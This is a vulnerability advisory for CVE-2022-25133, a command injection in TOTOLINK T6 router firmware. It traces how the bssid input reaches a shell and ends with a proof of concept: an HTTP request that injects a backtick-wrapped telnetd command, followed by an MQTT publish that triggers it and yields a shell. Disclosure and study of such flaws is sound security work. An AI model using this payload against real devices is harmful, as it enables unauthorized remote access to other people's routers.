Headline
CVE-2022-25133: my_vuln/20.md at main · pjqwudi1/my_vuln
A command injection vulnerability in the function isAssocPriDevice of TOTOLINK Technology router T6 V3_Firmware T6_V3_V4.1.5cu.748_B20211015 allows attackers to execute arbitrary commands via a crafted MQTT packet.
TOTOLINK Vulnerability
Vendor:TOTOLINK
Product:T6
Version:T6 V3_Firmware(T6_V3_V4.1.5cu.748_B20211015)(Download Link:https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/190/ids/36.html)
Type:Remote Command Execution
Author:Jiaqian Peng
Institution:[email protected]
Vulnerability description
We found an Command Injection vulnerability in TOTOLINK Technology router with firmware which was released recently,allows remote attackers to execute arbitrary OS commands from a crafted request.(MQTT, no authentication required)
Remote Command Execution
In setWiFiRepeaterCfg
function, bssid
is directly passed by the attacker, so we can control the bssid
to attack the OS.
First, make corresponding settings according to the selected network mode. This vulnerability occurs in the isAssocPriDevice
function. We mainly explain the data flow of this part.
In cstecgi.cgi
binary:
In setWiFiRepeaterCfg
function, the input has not been checked.And then,call the function apmib_set
to store this input.
In wireless.so
binary:
As you can see here, the input has not been checked.
In libmystdlib.so
function
Eventually, the initial input cause command injection.
Supplement
The trigger point of this vulnerability is deep in the program path, so we recommend that the string content should be strictly checked when extracting user input.
Vulnerability trigger steps:
- set
bssid
=telnetd
, in (setWiFiRepeaterCfg
) - in (
freeStaClient
)
PoC
We set bssid
as telnetd
, and the router will excute it,such as:
POST /cgi-bin/cstecgi.cgi HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 53 Origin: http://192.168.1.1 Connection: close Referer: http://192.168.1.1/basic/wifi.html?time=1644749893933 Cookie: SESSION_ID=2:1644749886:2
{"bssid":"`telnetd`","topicurl":"setWiFiRepeaterCfg"}
in (freeStaClient
)
import paho.mqtt.client as mqtt client = mqtt.Client() client.connect("192.168.1.1",1883,60) client.publish(‘totolink/router/freeStaClient’,payload=’{"hack":"hack"}’)
Result
Get a shell!